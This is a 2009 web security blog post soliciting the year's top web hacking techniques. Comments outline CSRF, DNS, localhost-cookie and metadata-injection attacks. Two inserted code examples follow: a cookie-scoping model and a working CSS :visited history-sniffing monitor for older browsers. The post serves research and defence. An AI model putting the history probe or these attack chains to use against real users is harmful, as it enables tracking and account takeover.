A page to show up #1 on Google when searching for "Jeremiah" (currently #4). Only the prophet and the TV show are left! I have the edge: the TV show is cancelled and the prophet isn't generating any new content.

The prophet, the TV show, and that pesky Owyang guy are going down! A page to show up #1 on Google when searching for "Jeremiah Grossman", and it FINALLY has!

Monday, January 26, 2009

Calling all Researchers! Send in the Top Web Hacking Techniques of 2008

It's time once again to assemble the Top Ten Web Hacking Techniques of the past year. Every year Web security produces a plethora of new and extremely clever hacking techniques (loosely defined: techniques, not specific incidents), many of which are published in hard-to-find places. 2008 was no different. As we've done for the past two years, we're looking for the best of the best. The effort serves as a centralized community reference and recognizes the exceptional researchers who have contributed to our collective knowledge.

This year is special: the researcher who places #1 will not only receive praise from his peers but also one free pass to the BlackHat USA Briefings 2009, over $1,000 (US) in value, generously sponsored by BlackHat. Winners will be chosen by a panel of judges (Rich Mogull, Chris Hoff, HD Moore, Jeff Forristal) on the basis of novelty, impact, and pervasiveness.

We're also going to need your help. Below we're building a living list of everything found so far. If anything is missing (and we're positive something is, because last year's list had over 80 entries), we'd appreciate a comment containing the link. Thank you and good luck!

27 comments:

Turning a local DoS vulnerability on CUPS into a remote exploit via specially-crafted webpage

This research nicely shows how combining different bugs can turn a local crash into a remote exploit via a specially crafted web page.

The three vulns in particular are (copied and pasted from the original source):

"1. CUPS allows anonymous users to add/remove RSS Subscriptions. This issue only affects CUPS <1.3.8. I later learned that this issue had been reported in the past and tracked by Apple as STR #2774. This issue is also being tracked as CVE-2008-5184
2. HTTP requests submitted to the CUPS web interface (http://localhost:631/) can be forged due to lack of tokenization (CSRF)
3. Exceeding the maximum # of RSS Subscriptions (100 by default) leads to a NULL pointer dereference crash. This issue is being tracked as CVE-2008-5183"

A "localhost." record in a domain pointing to 127.0.0.1, plus an XSS vulnerability in a local application with a web interface, as a source of cookies for that domain, and the potential threat to other applications listening on the local interface.
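What that comment describes, as an added example that is not part of the comment or the original post: RFC 6265 cookie scoping applied to a zone that carries a `localhost.example.com` A record for 127.0.0.1. The domain name, the local application's port and path, and the cookie names are hypothetical; the code models the user agent's domain-match and path-match rules and reports which cookies an XSS in the local app would be able to read.

```javascript
// Added example (not from the original post or the commenter): which cookies a
// browser sends to "localhost.example.com" (resolving to 127.0.0.1) under the
// RFC 6265 matching rules. Hostnames, ports, paths and cookies are hypothetical.

// RFC 6265 section 5.1.3: does the request host domain-match the cookie's domain?
function domainMatches(host, cookieDomain) {
  host = host.toLowerCase();
  cookieDomain = cookieDomain.toLowerCase().replace(/^\./, '');
  if (host === cookieDomain) return true;
  if (!host.endsWith('.' + cookieDomain)) return false;
  // An IP address literal never domain-matches anything but itself, which is
  // why the attacker needs a real hostname for 127.0.0.1 in the first place.
  return !/^\d{1,3}(\.\d{1,3}){3}$/.test(host);
}

// RFC 6265 section 5.1.4 path matching.
function pathMatches(reqPath, cookiePath) {
  if (reqPath === cookiePath) return true;
  if (!reqPath.startsWith(cookiePath)) return false;
  return cookiePath.endsWith('/') || reqPath[cookiePath.length] === '/';
}

// A cookie as the user agent stores it after Set-Cookie. hostOnly is true when
// the server omitted the Domain attribute, which is the safe default.
function storedCookie(name, value, setByHost, attrs = {}) {
  const hostOnly = !attrs.domain;
  return {
    name, value, hostOnly,
    domain: hostOnly ? setByHost.toLowerCase() : attrs.domain.toLowerCase().replace(/^\./, ''),
    path: attrs.path || '/',
    secure: !!attrs.secure,
  };
}

// Names of the cookies attached to a request for scheme://host/path (section 5.4).
function cookiesFor(jar, scheme, host, reqPath) {
  return jar.filter(c => {
    const domainOk = c.hostOnly ? host.toLowerCase() === c.domain
                                : domainMatches(host, c.domain);
    return domainOk && pathMatches(reqPath, c.path) && (!c.secure || scheme === 'https');
  }).map(c => c.name);
}

// Constructed scenario: www.example.com sets a session cookie scoped to the whole
// domain (the common mistake), a host-only preference cookie, and a Secure
// domain-wide cookie. The zone also carries "localhost.example.com. IN A 127.0.0.1".
const jar = [
  storedCookie('sid',  'abc', 'www.example.com', { domain: '.example.com' }),
  storedCookie('pref', 'xyz', 'www.example.com'),
  storedCookie('csrf', 'tok', 'www.example.com', { domain: '.example.com', secure: true }),
];

// What an XSS in a local web app reached as http://localhost.example.com:631/ can
// read from document.cookie: the domain-wide, non-Secure session cookie.
function leakedToLocalApp() {
  return cookiesFor(jar, 'http', 'localhost.example.com', '/');
}

// The same app reached by IP address gets nothing, since 127.0.0.1 never
// domain-matches example.com.
function leakedViaIp() {
  return cookiesFor(jar, 'http', '127.0.0.1', '/');
}
```

The two defences the model makes visible: a cookie without a Domain attribute (`pref`) is host-only and never reaches `localhost.example.com`, and a Secure cookie (`csrf`) is withheld from the local app's plain-HTTP origin. Session cookies that are both domain-wide and non-Secure are the ones this DNS trick exposes.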

Remembering 'Forgot My Password': Turning DNS Compromise Into A Generic Authentication Bypass For Most Web Frameworks And Major Properties

I'm sure everyone's sick of the DNS brouhaha, but I'd like to point out that there really weren't many systems *not* vulnerable to having their DNS polluted, thus causing their "forgotten password" emails to go to a controllable location. This attack was particularly fun on content management frameworks, because you don't just get the ability to read content: Forget the admin's password, and suddenly you get to post or modify arbitrary PHP thus allowing full remote code execution.

Whether it's more significant to get code execution on a CMS or user-level access to MySpace/Facebook/Google/Yahoo/AIM/Hotmail/GoToMyPC from one common attack is up to the discretion of the reader.

Jeremiah, what about my work? Abusing HTML 5 Structured Client-side Storage: http://trivero.secdiscover.com/html5whitepaper.pdf Do you think it's a good one for a mention? I know, it's not fair to endorse oneself.. :)

I sent you an email with the 18 pieces of research I published in 2008. These are only part of the research I did last year, and over time I'll publish many more of my findings (from 2006, 2007 and 2008).

Do you make a list of hacking techniques only for 2008? Because such an interesting technique as Cross-Site Printing was published in December 2007 and was in the Top Web Hacking Techniques of 2007 (is there a need to repeat yourself?). If it's a new version of the technique, that's another case.

P.S.

Besides, about the same-site scripting mentioned by Martin: I already wrote about attacking localhost aka 127.0.0.1 (particularly via XSS) back in November 2006 in my article Using of vulnerabilities at local machines (http://websecurity.com.ua/369/), which you can read in English (http://www.google.com/translate?u=http://websecurity.com.ua/369/&langpair=ua%7Cen&hl=en&ie=UTF8).

@pdp, added most, but not all. Couldn't decide on a couple, but open to being convinced.

"Router Hacking Challenge" seemed like a collection of vulnerabilities, not "techniques", and didn't seem novel enough over existing research. Same reasoning behind "Call Jacking: Phreaking the BT Home Hub" and "The Pownce Worm". What should be reconsidered?

Winamp "NowPlaying" Unspecified Vulnerability: The Details (http://blog.watchfire.com/wfblog/2008/09/winamp-nowplayi.html) - The post discussed an attack against a desktop application (Winamp, in this case). It consisted of poisoning the metadata of mp3 files with JavaScript. When played, the poisoned mp3 files caused a script injection into the context of an embedded browser within Winamp. Since the injected JavaScript code had some access to internal functionality of Winamp, the attack could potentially be extended further into the "desktop world".

Although this vulnerability has only just been published, in 2009, it was discovered in October 2008, so I thought it was worth adding to the list.

By forging the request that adds a new forwarding rule, a copy of any email sent to the victim user will be sent to the attacker's inbox.

The bug affects all supported versions of Novell GroupWise, the third-biggest corporate email software product which has a base of about 30 million users according to Novell.

It could be argued that this is a vulnerability, not a technique. In reality it's both. The feature being forged is different from the usual CSRF payloads most people are familiar with:

- adding a new administrative user (applies to admin consoles)
- changing the targeted user's password (would only work if the current password is NOT required to set a new one)
- transferring money (applies to financial apps)

Adrian, yes, it's possible to include this new research in the current list.

It depends on the author's position. For example, yesterday I wrote the article Enumerating logins via Abuse of Functionality vulnerabilities (http://websecurity.com.ua/2840/, which you can read in English at http://www.google.com/translate?u=http://websecurity.com.ua/2840/&langpair=ua%7Cen&hl=en&ie=UTF8). I did this research in March 2008, but because I published it this year, this article would count among 2009's hacking techniques.

@Adrian, not to take anything away from the good research, but I don't think this qualifies as a new "technique." While there is some wiggle room for inclusion, I really wanted to stay away from a general list of vulnerabilities.

What it does is fetch all the websites you have visited, and the ones you "are" visiting. So if, for example, you go to www.w3.org and then in another tab you go to:

http://eaea.sirdarckcat.net/cssh-mon/cssh-mon.php?z=http%3A%2F%2Fwww.w3.org%2F

Then you can navigate on w3.org and CSSH-MON will fetch all your navigation history (with the exact time you clicked each link).

The references are:
http://www.yscx.net/root/documents/The_Sexy_Assassin.ppt
http://p42.us/css/
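The history probe such a monitor is built on, as an added example that is not the CSSH-MON source: a stylesheet that colours `:visited` links, one hidden link per candidate URL, and a script that reads the computed colour back and timestamps each newly visited link on every poll. The candidate URLs and the browsing history are constructed, and the two "browsers" are stand-ins: in a real page the resolver is `getComputedStyle` on the probe link. Browsers closed this side channel in early 2011 (Firefox 4, Chrome 9) by reporting visited links with their unvisited style, so the probe only works against browsers of the era the comment describes; the hardened stand-in shows what it sees today.

```javascript
// Added example (not the CSSH-MON code): the :visited history probe and the
// polling loop that turns it into a navigation monitor. URLs, history and the
// two browser stand-ins are constructed.

// 1. Probe stylesheet: visited links get a colour the script can read back.
function probeStylesheet() {
  return 'a.probe { color: rgb(0, 0, 0); }\n' +
         'a.probe:visited { color: rgb(255, 0, 0); }';
}

// 2. One hidden link per candidate URL; the id carries the index back to the URL.
function probeLinks(urls) {
  const esc = s => s.replace(/[&<>"']/g,
    c => ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
  return urls.map((u, i) => `<a class="probe" id="p${i}" href="${esc(u)}">${i}</a>`).join('\n');
}

// 3. Read each link's computed colour. In a real page the resolver is
//    i => getComputedStyle(document.getElementById('p' + i)).color
function probeHistory(urls, resolveColor) {
  return urls.filter((u, i) => resolveColor(i) === 'rgb(255, 0, 0)');
}

// 4. The monitor: poll repeatedly and timestamp each link that newly turns
//    "visited", so the victim's clicks on the target site are logged as they happen.
function pollNavigation(urls, resolveColor, seen, now) {
  const hits = [];
  for (const u of probeHistory(urls, resolveColor)) {
    if (!seen.has(u)) { seen.add(u); hits.push({ url: u, at: now }); }
  }
  return hits;
}

// Stand-in for a pre-2011 browser that applied :visited styles faithfully.
function leakyResolver(urls, browsingHistory) {
  return i => browsingHistory.has(urls[i]) ? 'rgb(255, 0, 0)' : 'rgb(0, 0, 0)';
}

// Stand-in for a current browser: :visited links report the unvisited colour
// to getComputedStyle, so the probe learns nothing.
function hardenedResolver() {
  return () => 'rgb(0, 0, 0)';
}

// Constructed scenario: candidate links on the target site, one already visited.
const candidateUrls = ['http://www.w3.org/', 'http://www.w3.org/TR/', 'http://www.w3.org/Consortium/'];
const constructedHistory = ['http://www.w3.org/'];

function demo() {
  const history = new Set(constructedHistory);
  const seen = new Set();
  const first = pollNavigation(candidateUrls, leakyResolver(candidateUrls, history), seen, 1000);
  history.add('http://www.w3.org/TR/'); // the victim clicks a link in the other tab
  const second = pollNavigation(candidateUrls, leakyResolver(candidateUrls, history), seen, 2000);
  return { first, second, hardened: probeHistory(candidateUrls, hardenedResolver()) };
}
```

The monitor's link list has to be assembled from the target site's own pages (the `z=` parameter in the comment's URL names that site), because the probe can only ask about URLs it already knows; it cannot enumerate history, only confirm candidates.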